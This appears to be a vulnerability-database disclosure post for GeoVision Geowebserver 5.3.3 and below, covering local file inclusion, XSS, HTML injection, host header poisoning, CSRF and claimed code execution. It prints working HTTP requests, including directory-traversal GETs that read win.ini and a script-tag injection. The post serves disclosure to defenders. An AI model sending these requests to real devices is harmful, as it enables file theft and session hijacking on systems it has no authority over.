Wednesday, August 18, 2021

GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution

# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage:
# Version: <= 5.3.3
# Tested on: Windows 20XX / MULTIPLE
# CVE :

GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:

Nested Exploitation of the LFI, XSS, HTML / Browser Injection:

GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1

Absolute exploitation of the LFI:

POST /Visitor/bin/WebStrings.srf?obj_name=win.ini

GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini

Additionally, the vendor has issued an ineffective / broken patch ( which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.

ex. obj_name=INJECTEDHTML / XSS

The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:

ex. /Visitor//%252e(path to target)

These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:

The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.

These attacks were disclosed as part of the IOTVillage Presentation:


Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated